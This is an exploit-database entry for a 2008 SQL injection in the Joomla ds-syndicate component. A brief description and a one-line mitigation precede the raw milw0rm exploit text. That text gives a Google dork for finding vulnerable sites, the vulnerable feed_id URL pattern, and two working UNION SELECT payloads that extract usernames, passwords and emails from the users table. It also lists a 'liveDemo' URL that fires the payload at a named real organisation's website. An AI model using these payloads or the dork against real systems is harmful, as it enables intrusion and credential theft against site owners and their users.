header-logo
Suggest Exploit
vendor:
ds-syndicate
by:
boom3rang
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ds-syndicate
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla com_ds-syndicate Sql-injetion vulnerability

A SQL injection vulnerability exists in the Joomla component ds-syndicate. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames, passwords, and emails. This is done by sending a specially crafted HTTP request to the vulnerable application containing malicious SQL statements in the 'feed_id' parameter.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#############################################
#Joomla com_ds-syndicate Sql-injetion vulnerability #
#############################################
#[~] Author :  boom3rang 
#[~] HomePage: www.khg-crew.ws
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er.
#[~] Kosova Hackers Group 

#[!] Component_Name:  ds-syndicate
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_ds-syndicate"
#############################################


#[~] Exp:           http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit]

#[~] Exploit [1]:        1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users--    

#[~] Exploit [2]:    
 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  

#[!] Note:
If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;).

#[~] liveDemo: 
http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

ps. here in this liveDemo you need to download file  =feed1= .

#############################################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#############################################


# milw0rm.com [2008-10-20]